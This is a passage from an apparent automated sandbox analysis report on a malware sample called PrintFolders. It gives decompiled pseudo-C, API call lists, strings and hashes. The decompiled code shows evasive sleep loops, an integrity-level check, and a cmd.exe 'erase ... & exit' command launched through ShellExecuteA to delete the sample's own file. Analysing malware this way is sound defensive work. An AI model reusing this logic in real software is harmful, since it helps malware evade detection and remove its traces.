							_t30 = EqualSid(_v84, _v104);
							FreeSid(_v104);
							_pop(_t44);
							return E0040EBBF(_t30, _t35, _v8 ^ _t45, _t40, _t41, _t44);
						}
					} else {
						CloseHandle();
						goto L3;
					}
				}
			}

0x004065e0
0x004065e6
0x004065ed
0x004065f3
0x004065fd
0x00406612
0x00406636
0x00406645
0x00406614
0x00406623
0x00406629
0x0040662e
0x00406646
0x0040666e
0x00000000
0x00406670
0x00406670
0x00406677
0x00406682
0x0040668f
0x00406698
0x00406698
0x00406630
0x00406630
0x00000000
0x00406630
0x0040662e

APIs

GetCurrentProcess.KERNEL32(00000008,?), ref: 00406603
OpenProcessToken.ADVAPI32(00000000), ref: 0040660A
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 00406623
CloseHandle.KERNEL32(?), ref: 00406630
CloseHandle.KERNEL32(?), ref: 00406646
AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00406666
EqualSid.ADVAPI32(?,?), ref: 00406677
FreeSid.ADVAPI32(?), ref: 00406682

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AllocateCurrentEqualFreeInformationInitializeOpen
String ID:
API String ID: 1013447061-0
Opcode ID: 8e728c0aa3363026ab09ef20ff487f076741c97f8360c68268a6665fe9e221c8
Instruction ID: 578e346a92eed40973933b436f29d829d3a9d7cfed80168a2ded3e3812858e1e
Opcode Fuzzy Hash: 8e728c0aa3363026ab09ef20ff487f076741c97f8360c68268a6665fe9e221c8
Instruction Fuzzy Hash: 3E111F31B0021CABDB20DFE1DD49BAEB7B9FF08701F400479E906EA190DAB599169B59

Uniqueness

Uniqueness Score: -1.00%

Function 00408D00 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 347
sleepCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00408D00(void* __ebx, void* __edi, long __esi, void* __eflags, char _a4) {
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				char _v44;
				char _v68;
				char _v92;
				char _v420;
				char _v748;
				char _v1076;
				signed char _v1080;
				intOrPtr _v1084;
				signed int _v1088;
				intOrPtr _v1092;
				char _v1116;
				char _v1140;
				char _v1164;
				char _v1188;
				char _v1212;
				char _v1236;
				char _v1260;
				signed int _v1284;
				short _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				signed int _t107;
				signed int _t108;
				void* _t110;
				void* _t114;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t132;
				void* _t133;
				signed int _t136;
				void* _t148;
				void* _t149;
				signed int _t151;
				void* _t156;
				void* _t160;
				void* _t161;
				signed int _t163;
				signed int _t167;
				intOrPtr _t170;
				signed int _t179;
				void* _t180;
				signed char _t183;
				char* _t187;
				intOrPtr _t188;
				signed char _t192;
				signed int _t197;
				void* _t204;
				intOrPtr _t251;
				signed int _t269;
				signed int _t295;
				signed int _t299;
				signed int _t300;
				void* _t301;
				void* _t302;
				void* _t308;
				void* _t309;
				signed int _t310;
				void* _t315;

				_t292 = __esi;
				_t289 = __edi;
				_push(0xffffffff);
				_push(0x42ca27);
				_push( *[fs:0x0]);
				_t302 = _t301 - 0x4dc;
				_t107 =  *0x43d054; // 0x7bd02ead
				_t108 = _t107 ^ _t299;
				_v20 = _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t108);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				_t110 = E00405F40(__ebx, __edi); // executed
				_t201 = Sleep;
				_t318 = _t110;
				if(_t110 == 0) {
					L3:
					E00401960( &_v748, "1"); // executed
					_v8 = 1;
					_t114 = E00402510( &_v1140, E0040B8F0(E00409340(_t201, _t271, _t289, _t292)));
					_v8 = 2;
					_t117 = E00402510( &_v1116, E0040B800(E00409290(_t271, _t114, _t292)));
					_v8 = 3;
					L37();
					_t119 = E00402510( &_v1260, E0040B7D0(_t117));
					_v8 = 4;
					_t120 = E0040C930( &_v1236, 0x450e3c, _t119);
					_v8 = 5;
					_t121 = E0040C990( &_v1212, _t120,  &_a4);
					_v8 = 6;
					_t122 = E0040CA40( &_v1188, _t121, _t117);
					_v8 = 7;
					_t123 = E0040CA40( &_v1164, _t122, _t114);
					_v8 = 8;
					E0040C990( &_v92, _t123, 0x450e24);
					_t308 = _t302 - 0x10 + 0x14;
					E00402440(_t201,  &_v1164);
					E00402440(_t201,  &_v1188);
					E00402440(_t201,  &_v1212);
					E00402440(_t201,  &_v1236);
					E00402440(_t201,  &_v1260);
					E00402440(_t201,  &_v1116);
					_v8 = 0x10;
					E00402440(_t201,  &_v1140);
					_t294 = 0;
					_t291 = 0xc8;
					while(1) {
						_t294 =  &(1[_t294]);
						_t132 = E00402400( &_v92);
						_t226 =  &_v748;
						_t133 = E00402300(_t201,  &_v748, _t291, _t132); // executed
						if(_t133 == 0) {
							goto L8;
						}
						E00402510( &_v44, E00402370( &_v748));
						_t280 = "0";
						if(E00402800( &_v44, "0") != 0) {
							L11:
							E00402440(_t201,  &_v44);
							E0040BB70( &_v68);
							_t309 = _t308 - 0x10;
							_v8 = 0x11;
							E00401960( &_v1076, "0"); // executed
							_v8 = 0x12;
							while(1) {
								_t148 = E00402510( &_v1116, E0040B8C0(E004093D0(_t201, _t280, _t291, _t294)));
								_t280 = 0x450e54;
								_v8 = 0x15;
								_t149 = E0040C930( &_v1140, 0x450e54, _t148);
								_t309 = _t309 + 4;
								_v8 = 0x16;
								_t151 = E00402300(_t201,  &_v1076, _t291, E00402400(_t149)); // executed
								_t294 = _t151;
								E00402440(_t201,  &_v1140);
								_v8 = 0x12;
								E00402440(_t201,  &_v1116);
								__eflags = _t151;
								if(_t151 == 0) {
									goto L15;
								}
								E00402410( &_v68, E00402370( &_v1076));
								_t156 = E004023F0( &_v68);
								__eflags = _t156 - 0xa;
								if(_t156 <= 0xa) {
									goto L15;
								}
								__eflags = _t156 - 0x64;
								if(_t156 < 0x64) {
									_t310 = _t309 - 0x10;
									_t295 = 0;
									__eflags = 0;
									E00401960( &_v420, "1"); // executed
									_v8 = 0x17;
									do {
										_v1092 = _t295 + 1;
										_t160 = E00402510( &_v1116, E0040B7A0(E00409460(_t280, _t291, _t295 + 1)));
										_t280 = 0x450e54;
										_v8 = 0x1a;
										_t161 = E0040C930( &_v1140, 0x450e54, _t160);
										_t310 = _t310 + 4;
										_v8 = 0x1b;
										_t163 = E00402300(_t201,  &_v420, _t291, E00402400(_t161)); // executed
										E00402440(_t201,  &_v1140);
										_v8 = 0x17;
										E00402440(_t201,  &_v1116);
										__eflags = _t163;
										if(_t163 == 0) {
											goto L20;
										}
										_t201 = E00402380( &_v420);
										__eflags = _t201 - 0x16;
										if(__eflags <= 0) {
											goto L20;
										}
										_push( ~(0 | __eflags > 0x00000000) |  &(1[_t201]));
										_t179 = E004162EE();
										_t77 =  &(1[_t201]); // 0x1
										_t291 = _t179;
										_t180 = E00402340( &_v420, _t179, _t77);
										_push( ~(0 | __eflags > 0x00000000) | _t201 * 0x00000002); // executed
										_t183 = E004162EE(); // executed
										_t315 = _t310 + 4 - 0x14;
										_v1080 = _t183;
										E0040BB90(_t201, _t315, _t201 * 2 >> 0x20, _t179,  &_v68);
										_t187 = E00403770(_t201, _t179, _t180, _t291,  &_v1080); // executed
										_t280 = _t187;
										_t188 = E00402B60(_v1080, _t187, __eflags,  &_v1088,  &_v1088); // executed
										_t310 = _t315 + 0x24;
										_v1084 = _t188;
										__eflags = _v1088;
										if(_v1088 != 0) {
											_t291 = Sleep;
											_t295 = 0;
											_v1080 = 0;
											_t201 = 0;
											__eflags = 0;
											do {
												_t269 = _v1084(E00402400(0x450e6c), E00402400(0x450df4));
												_t310 = _t310 + 8;
												_t192 = _v1080;
												_t280 = 1;
												__eflags = _t192;
												if(_t192 != 0) {
													__eflags = _t269;
													_t201 =  ==  ? 1 : _t201 & 0x000000ff;
													__eflags = _t201;
												}
												__eflags = _t295 - 0xa;
												if(_t295 >= 0xa) {
													__eflags = _t269 - 1;
													_t201 =  !=  ? _t280 : _t201 & 0x000000ff;
													__eflags = _t201;
												}
												__eflags = _t295 - 0xf;
												if(_t295 < 0xf) {
													__eflags = _t295 - 5;
													if(_t295 < 5) {
														goto L33;
													}
													goto L31;
												} else {
													__eflags = _t269 - 1;
													if(_t269 == 1) {
														_t201 = _t269;
													}
													L31:
													__eflags = _t192;
													if(_t192 != 0) {
														goto L33;
													}
													__eflags = _t269 - 0xfffffffe;
													if(__eflags == 0) {
														Sleep(0x7d0); // executed
														L36:
														E004054C0(_t201, __eflags); // executed
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_push(_t299);
														_t300 = _t310;
														_t167 =  *0x43d054; // 0x7bd02ead
														_v1284 = _t167 ^ _t300;
														_v1300 = 0x5a405b41;
														_v1296 = 0x5e465e00;
														_v1292 = 0x4c5b5d11;
														_t251 =  *((intOrPtr*)( *[fs:0x2c]));
														_t170 =  *0x450f38; // 0x80000017
														_v1288 = 0x2e13;
														__eflags = _t170 -  *((intOrPtr*)(_t251 + 4));
														if(_t170 >  *((intOrPtr*)(_t251 + 4))) {
															E0040EF48(_t170, 0x450f38);
															__eflags =  *0x450f38 - 0xffffffff;
															if(__eflags == 0) {
																asm("movaps xmm0, [0x439d70]");
																asm("movups [0x450db0], xmm0");
																 *0x450dc8 = _v20;
																asm("movq xmm0, [ebp-0x14]");
																asm("movq [0x450dc0], xmm0");
																 *0x450dcc = _v16;
																E0040F25B(_t251, __eflags, 0x42d490);
																E0040EEFE(0x450f38);
															}
														}
														__eflags = _v12 ^ _t300;
														return E0040EBBF(0x450db0, _t201, _v12 ^ _t300, _t280, _t291, _t295);
													}
												}
												L33:
												__eflags = _t269 - 1;
												_t194 =  ==  ? _t280 : _t192 & 0x000000ff;
												_t295 = _t295 + 1;
												_v1080 =  ==  ? _t280 : _t192 & 0x000000ff;
												Sleep(0x7d0); // executed
												__eflags = _t201;
											} while (__eflags == 0);
											goto L36;
										}
										L20:
										_t295 = _v1092;
										__eflags = _t295 - 0xa;
									} while (__eflags < 0);
									goto L36;
								}
								L15:
								Sleep(0xbb8);
							}
						}
						_t280 = "1";
						if(E00402800( &_v44, "1") != 0) {
							goto L11;
						}
						_t226 =  &_v44;
						E00402440(_t201,  &_v44);
						L8:
						_t324 = _t294 - 0x12c;
						if(_t294 <= 0x12c) {
							_t46 = _t294 + 3; // 0x4
							Sleep(_t46 * 0x3e8);
						} else {
							_t136 = E00417DF6(_t226, _t324);
							asm("cdq");
							Sleep((_t136 % _t291 + 0x67) * 0x3e8);
						}
					}
				} else {
					_t292 = 0x7d0;
					do {
						_t197 = E00417DF6(_t204, _t318);
						asm("cdq");
						_t271 = _t197 % 0x7d0 + 0x3e8;
						Sleep(_t197 % 0x7d0 + 0x3e8);
					} while (E00405F40(Sleep, __edi) != 0);
					goto L3;
				}
			}

0x00408d00
0x00408d00
0x00408d03
0x00408d05
0x00408d10
0x00408d11
0x00408d17
0x00408d1c
0x00408d1e
0x00408d21
0x00408d22
0x00408d23
0x00408d24
0x00408d28
0x00408d2e
0x00408d35
0x00408d3a
0x00408d40
0x00408d42
0x00408d6a
0x00408d78
0x00408d7d
0x00408d94
0x00408d9b
0x00408db2
0x00408db9
0x00408dbd
0x00408dd0
0x00408ddb
0x00408de5
0x00408df0
0x00408dfd
0x00408e08
0x00408e12
0x00408e1d
0x00408e27
0x00408e36
0x00408e3d
0x00408e42
0x00408e4b
0x00408e56
0x00408e61
0x00408e6c
0x00408e77
0x00408e82
0x00408e8d
0x00408e91
0x00408e96
0x00408e98
0x00408ea0
0x00408ea3
0x00408ea4
0x00408eaa
0x00408eb0
0x00408eb7
0x00000000
0x00000000
0x00408ec8
0x00408ecd
0x00408edc
0x00408f2b
0x00408f2e
0x00408f36
0x00408f3b
0x00408f3e
0x00408f4d
0x00408f52
0x00408f56
0x00408f69
0x00408f6f
0x00408f74
0x00408f7e
0x00408f83
0x00408f88
0x00408f98
0x00408fa3
0x00408fa5
0x00408fb0
0x00408fb4
0x00408fb9
0x00408fbb
0x00000000
0x00000000
0x00408fcc
0x00408fd4
0x00408fd9
0x00408fdc
0x00000000
0x00000000
0x00408fde
0x00408fe1
0x00408fef
0x00408ff8
0x00408ff8
0x00408fff
0x00409004
0x00409010
0x00409011
0x0040902a
0x00409030
0x00409035
0x0040903f
0x00409044
0x00409049
0x00409059
0x00409066
0x00409071
0x00409075
0x0040907a
0x0040907c
0x00000000
0x00000000
0x0040908d
0x0040908f
0x00409092
0x00000000
0x00000000
0x004090a6
0x004090a7
0x004090af
0x004090b2
0x004090bc
0x004090d5
0x004090d6
0x004090db
0x004090de
0x004090ea
0x004090fa
0x00409108
0x00409112
0x00409117
0x0040911a
0x00409120
0x00409127
0x0040913d
0x00409143
0x00409145
0x0040914c
0x0040914c
0x00409150
0x0040916c
0x0040916e
0x00409171
0x00409177
0x0040917c
0x0040917e
0x00409180
0x00409185
0x00409185
0x00409185
0x00409188
0x0040918b
0x0040918d
0x00409193
0x00409193
0x00409193
0x00409196
0x00409199
0x004091a4
0x004091a7
0x00000000
0x00000000
0x00000000
0x0040919b
0x0040919b
0x0040919e
0x004091a0
0x004091a0
0x004091a9
0x004091a9
0x004091ab
0x00000000
0x00000000
0x004091ad
0x004091b0
0x004091d4
0x004091d6
0x004091d6
0x004091db
0x004091dc
0x004091dd
0x004091de
0x004091df
0x004091e0
0x004091e1
0x004091e6
0x004091ed
0x004091f6
0x004091fd
0x00409204
0x0040920b
0x0040920d
0x00409212
0x00409218
0x0040921e
0x00409225
0x0040922d
0x00409234
0x00409236
0x00409240
0x00409247
0x0040924c
0x0040925a
0x00409262
0x00409268
0x00409272
0x00409277
0x00409234
0x00409282
0x0040928c
0x0040928c
0x004091b0
0x004091b2
0x004091b2
0x004091bd
0x004091c0
0x004091c1
0x004091c7
0x004091c9
0x004091c9
0x00000000
0x004091cd
0x00409129
0x00409129
0x0040912f
0x0040912f
0x00000000
0x00409138
0x00408fe3
0x00408fe8
0x00408fe8
0x00408f56
0x00408ede
0x00408eed
0x00000000
0x00000000
0x00408eef
0x00408ef2
0x00408ef7
0x00408ef7
0x00408efd
0x00408f1a
0x00408f24
0x00408eff
0x00408eff
0x00408f04
0x00408f14
0x00408f14
0x00408efd
0x00408d44
0x00408d44
0x00408d50
0x00408d50
0x00408d55
0x00408d58
0x00408d5f
0x00408d66
0x00000000
0x00408d50

APIs

Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 00405FE0
Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 004060D6

Sleep.KERNEL32(?,7BD02EAD), ref: 00408D5F

Part of subcall function 00405F40: __Init_thread_footer.LIBCMT ref: 004061D5
Part of subcall function 00405F40: GetForegroundWindow.USER32 ref: 00406276
Part of subcall function 00405F40: GetWindowTextA.USER32 ref: 00406291

Sleep.KERNEL32(?,00000000,00000000,?,?,?,?,00439B30,7BD02EAD), ref: 00408F14
Sleep.KERNEL32(00000004,00000000,?,?,?,?,00439B30,7BD02EAD), ref: 00408F24
Sleep.KERNEL32(00000BB8,00000000,00439B34,?,?,?,?,?,?,?,?,00439B30,7BD02EAD), ref: 00408FE8
Sleep.KERNEL32(000007D0), ref: 004091C7

Part of subcall function 00403770: CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,7BD02EAD), ref: 004037F0
Part of subcall function 00403770: CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403814
Part of subcall function 00403770: _mbstowcs.LIBCMT ref: 00403867
Part of subcall function 00403770: CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 0040387E
Part of subcall function 00403770: GetLastError.KERNEL32 ref: 00403888

Sleep.KERNEL32(000007D0), ref: 004091D4

Strings

)<, xrefs: 00408E12

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Sleep$CryptInit_thread_footer$HashWindow$AcquireContextCreateDataErrorForegroundLastText_mbstowcs
String ID: )<
API String ID: 1673536643-2400745456
Opcode ID: 23d203c44105ae4b2082f425863ddf676ccaa81f6680862cae038eba0604537e
Instruction ID: 70604cc1ca8e53ac9b92178323d8b5bc0271906fc0c0c9cf9f081b3e31f09ae7
Opcode Fuzzy Hash: 23d203c44105ae4b2082f425863ddf676ccaa81f6680862cae038eba0604537e
Instruction Fuzzy Hash: C6C1C1B09001588ADB18F775CD997EE72689F5030CF4401BEE90AB72D2EE7C5E49CA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00409500 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 148
sleepthreadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00409500(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, char _a4, intOrPtr _a20, char* _a24) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v16;
				signed int _v20;
				char _v44;
				char _v220;
				char _v248;
				signed int _t32;
				signed int _t33;
				void* _t41;
				signed int _t42;
				char* _t44;
				void* _t47;
				signed int _t56;
				signed int _t57;
				signed int _t60;
				signed int _t61;
				void* _t62;
				signed char* _t65;
				signed int _t70;
				char* _t81;
				void* _t83;
				char _t85;
				signed int _t89;
				void* _t92;
				void* _t96;

				_t83 = __edi;
				_t62 = __ebx;
				_push(0xffffffff);
				_push(0x42ca80);
				_push( *[fs:0x0]);
				_t32 =  *0x43d054; // 0x7bd02ead
				_t33 = _t32 ^ _t89;
				_v20 = _t33;
				_push(_t33);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				E00417E17(__ecx, E00418873(__ecx, __edx, 0));
				_t81 = _a24;
				_t85 = _a4;
				_t92 = _t89 - 0xec + 8;
				_t65 =  >=  ? _t85 :  &_a4;
				if(_a20 != 3) {
					L7:
					_t65 =  >=  ? _t85 :  &_a4;
					if(_a20 == 4) {
						_t56 =  *_t65;
						_t81 = "/chk";
						if(_t56 !=  *_t81) {
							__eflags = _t56 -  *_t81;
							if(_t56 !=  *_t81) {
								L15:
								asm("sbb eax, eax");
								_t57 = _t56 | 0x00000001;
								__eflags = _t57;
							} else {
								_t56 = _t65[1];
								__eflags = _t56 - _t81[1];
								if(_t56 != _t81[1]) {
									goto L15;
								} else {
									_t56 = _t65[2];
									__eflags = _t56 - _t81[2];
									if(_t56 != _t81[2]) {
										goto L15;
									} else {
										_t56 = _t65[3];
										__eflags = _t56 - _t81[3];
										if(__eflags != 0) {
											goto L15;
										} else {
											_t57 = 0;
										}
									}
								}
							}
						} else {
							_t65 =  &(_t65[4]);
							_t57 = 0;
						}
						_t106 = _t57;
						if(_t57 == 0) {
							goto L17;
						}
					}
				} else {
					_t60 =  *_t65 & 0x000000ff;
					if(_t60 != 0x63) {
						L5:
						asm("sbb eax, eax");
						_t61 = _t60 | 0x00000001;
						__eflags = _t61;
					} else {
						_t60 = _t65[1] & 0x000000ff;
						if(_t60 != 0x68) {
							goto L5;
						} else {
							_t60 = _t65[2] & 0x000000ff;
							if(_t60 != 0x6b) {
								goto L5;
							} else {
								_t61 = 0;
							}
						}
					}
					if(_t61 == 0) {
						L17:
						_push(_t65);
						L24();
						_t92 = _t92 - 0xc;
						E0040B520( &_v220, _t81, _t106, "test");
						E00417CAD(0);
					} else {
						goto L7;
					}
				}
				CreateThread(0, 0, E004056A0, 0, 0, 0); // executed
				Sleep(0xbb8); // executed
				E00402510( &_v248, "SUB=");
				_t82 =  &_v248;
				_v8 = 1;
				E00405EA0(_t62,  &_a4,  &_v248, _t83);
				_v8 = 0;
				E00402440(_t62,  &_v248); // executed
				_t41 = E00404840(_t62,  &_v248); // executed
				_t86 = _t41; // executed
				_t42 = E00404F20(_t62, _t106); // executed
				_t70 = _t42;
				_t107 = _t41;
				if(_t41 == 0) {
					__eflags = _t70;
					_t82 = "start";
					_t44 =  ==  ? "start" : "r";
				} else {
					_t44 = "n";
				}
				E00402410(0x450e0c, _t44);
				E00406AA0(_t62,  &_v44, _t83, _t86, _t107); // executed
				_v8 = 2;
				_t47 = E0040CAE0(_t107);
				_t108 = _t47;
				if(_t47 != 0) {
					_t96 = _t92 - 0x18;
					E00402510(_t96, " ");
					E004066A0(_t62, E00402400( &_v44), _t83); // executed
					_t92 = _t96 + 0x18;
				}
				_t93 = _t92 - 0x18;
				_t74 = _t92 - 0x18;
				E0040BB90(_t62, _t93, _t82, _t83,  &_a4); // executed
				E00408D00(_t62, _t83, _t86, _t108); // executed
				E004054C0(_t62, _t108);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				return E00410B00(_t83, _t74, 0, 0xb0);
			}

0x00409500
0x00409500
0x00409503
0x00409505
0x00409510
0x00409517
0x0040951c
0x0040951e
0x00409522
0x00409526
0x0040952e
0x0040953e
0x00409543
0x00409549
0x0040954c
0x00409552
0x00409559
0x0040957f
0x00409585
0x0040958c
0x0040958e
0x00409590
0x00409597
0x004095a0
0x004095a2
0x004095c0
0x004095c0
0x004095c2
0x004095c2
0x004095a4
0x004095a4
0x004095a7
0x004095aa
0x00000000
0x004095ac
0x004095ac
0x004095af
0x004095b2
0x00000000
0x004095b4
0x004095b4
0x004095b7
0x004095ba
0x00000000
0x004095bc
0x004095bc
0x004095bc
0x004095ba
0x004095b2
0x004095aa
0x00409599
0x00409599
0x0040959c
0x0040959c
0x004095c5
0x004095c7
0x00000000
0x00000000
0x004095c7
0x0040955b
0x0040955b
0x00409560
0x00409576
0x00409576
0x00409578
0x00409578
0x00409562
0x00409562
0x00409568
0x00000000
0x0040956a
0x0040956a
0x00409570
0x00000000
0x00409572
0x00409572
0x00409572
0x00409570
0x00409568
0x0040957d
0x004095c9
0x004095c9
0x004095d0
0x004095d5
0x004095e3
0x004095ea
0x00000000
0x00000000
0x00000000
0x0040957d
0x004095fe
0x00409609
0x0040961a
0x0040961f
0x00409625
0x0040962c
0x00409637
0x0040963b
0x00409640
0x00409645
0x00409647
0x0040964c
0x0040964e
0x00409650
0x00409659
0x00409660
0x00409665
0x00409652
0x00409652
0x00409652
0x0040966e
0x00409676
0x0040967e
0x00409682
0x00409687
0x00409689
0x0040968b
0x00409695
0x004096a4
0x004096a9
0x004096a9
0x004096ac
0x004096b2
0x004096b5
0x004096ba
0x004096c2
0x004096c7
0x004096c8
0x004096c9
0x004096ca
0x004096cb
0x004096cc
0x004096cd
0x004096ce
0x004096cf
0x004096e0

APIs

Part of subcall function 00418873: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040953A,00000000), ref: 00418886
Part of subcall function 00418873: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004188B7

CreateThread.KERNEL32 ref: 004095FE
Sleep.KERNEL32(00000BB8), ref: 00409609

Strings

SUB=, xrefs: 0040960F
start, xrefs: 00409660
/chk, xrefs: 00409590
test, xrefs: 004095DE

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Time$CreateFileSleepSystemThreadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: /chk$SUB=$start$test
API String ID: 4044491330-2206718722
Opcode ID: 0b7e1866d143fc2a1f884dde0244745e592096d5921bc9574330ee586fdfa3a8
Instruction ID: f08724c49b25eef3d87a27f8e4f7b5a7e04b5c5297436c6f3479f7f723656a48
Opcode Fuzzy Hash: 0b7e1866d143fc2a1f884dde0244745e592096d5921bc9574330ee586fdfa3a8
Instruction Fuzzy Hash: 7C413D31A00104AACF11AB76CC127BEBBA19B15308F54447BE945B72C3EB7DDE46C69D

Uniqueness

Uniqueness Score: -1.00%

Function 004054C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E004054C0(void* __ebx, void* __eflags) {
				void* _v8;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				void* _v164;
				char _v172;
				void** _v180;
				void* _v184;
				void** _v188;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				void* _t50;
				void* _t52;
				void* _t53;
				void* _t54;
				signed int _t66;
				signed int _t71;
				void* _t75;
				signed int _t78;
				char _t79;
				void* _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void** _t107;
				signed int _t109;
				void* _t111;
				signed int _t113;

				_t46 =  *0x43d054; // 0x7bd02ead
				_v20 = _t46 ^ _t109;
				 *[fs:0x0] =  &_v16;
				_t50 = E00405420( &_v164, GetCurrentProcessId()); // executed
				_t103 = _t50;
				_v8 = 0;
				_t52 = E00405250(__ebx,  &_v140, GetCurrentProcessId()); // executed
				_v8 = 1;
				_t53 = E0040C710( &_v116, _t52);
				_v8 = 2;
				_t54 = E0040C880( &_v92, _t53, "\" /f & erase \"");
				_v8 = 3;
				_t98 = E0040CA40( &_v68, _t54, _t103);
				_v8 = 4;
				E0040C880( &_v44, _t98, "\" & exit");
				_t113 = _t111 - 0x94 + 0x10;
				E00402440(__ebx,  &_v68, _t46 ^ _t109);
				E00402440(__ebx,  &_v92, _t102);
				E00402440(__ebx,  &_v116,  *[fs:0x0]);
				E00402440(__ebx,  &_v140, 0x42c613);
				E00402440(__ebx,  &_v164, 0xffffffff);
				_t91 =  &_v44;
				ShellExecuteA(0, 0, "C:\\Windows\\System32\\cmd.exe", E00402400(_t91), 0, 0); // executed
				E00417CAD(0); // executed
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(_t109);
				_push(0xffffffff);
				_push(0x42c65e);
				_push( *[fs:0x0]);
				_push(__ebx);
				_push(_t103);
				_t66 =  *0x43d054; // 0x7bd02ead
				_push(_t66 ^ _t113);
				 *[fs:0x0] =  &_v172;
				_t104 = _t98;
				_t107 = _t91;
				_v180 = _t107;
				_v188 = _t107;
				_v184 = 0;
				 *_t107 = 0;
				_t107[4] = 0;
				_t107[5] = 0xf;
				 *_t107 = 0;
				_v164 = 0;
				_v184 = 1;
				E0040B9D0(__ebx, _t91, _t104, _t107, _t104);
				_t116 = _t104;
				if(_t104 > 0) {
					_t78 = 0x3e;
					do {
						_t71 = E00417DF6(_t91, _t116);
						_t91 = _t107[4];
						_t33 =  &(("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")[_t71 % _t78]); // 0x33323130
						_t79 =  *_t33;
						_t101 = _t107[5];
						_v24 = _t79;
						if(_t91 >= _t101) {
							_push(_v24);
							_v28 = 0;
							_t91 = _t107;
							E0040D240(_t79, _t107, _t104, _t107, _t107, _v28);
						} else {
							_t36 =  &(_t91[0]); // 0x1
							_t107[4] = _t36;
							_t75 = _t107;
							if(_t101 >= 0x10) {
								_t75 =  *_t107;
							}
							 *((char*)(_t75 + _t91)) = _t79;
							 *((char*)(_t75 +  &(_t91[0]))) = 0;
						}
						_t78 = 0x3e;
						_t104 = _t104 - 1;
					} while (_t104 != 0);
				}
				 *[fs:0x0] = _v20;
				return _t107;
			}

0x004054d7
0x004054de
0x004054e6
0x004054fa
0x004054ff
0x00405501
0x00405516
0x0040551f
0x00405523
0x0040552f
0x00405536
0x0040553e
0x0040554f
0x00405551
0x00405558
0x0040555d
0x00405563
0x0040556b
0x00405573
0x0040557e
0x00405589
0x00405592
0x004055a4
0x004055ac
0x004055b1
0x004055b2
0x004055b3
0x004055b4
0x004055b5
0x004055b6
0x004055b7
0x004055b8
0x004055b9
0x004055ba
0x004055bb
0x004055bc
0x004055bd
0x004055be
0x004055bf
0x004055c0
0x004055c3
0x004055c5
0x004055d0
0x004055d4
0x004055d6
0x004055d7
0x004055de
0x004055e2
0x004055e8
0x004055ea
0x004055ec
0x004055ef
0x004055f2
0x004055f9
0x004055ff
0x00405606
0x0040560d
0x00405610
0x00405618
0x0040561f
0x00405624
0x00405626
0x00405628
0x00405630
0x00405630
0x00405637
0x0040563c
0x0040563c
0x00405642
0x00405645
0x0040564a
0x00405665
0x00405668
0x00405670
0x00405672
0x0040564c
0x0040564c
0x0040564f
0x00405652
0x00405657
0x00405659
0x00405659
0x0040565b
0x0040565e
0x0040565e
0x00405677
0x0040567c
0x0040567c
0x00405630
0x00405686
0x00405694

APIs

GetCurrentProcessId.KERNEL32(7BD02EAD), ref: 004054EC

Part of subcall function 00405420: OpenProcess.KERNEL32(00000410,00000000,?,00450D41,00000000), ref: 0040544B
Part of subcall function 00405420: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,00450D41,00000000), ref: 00405466
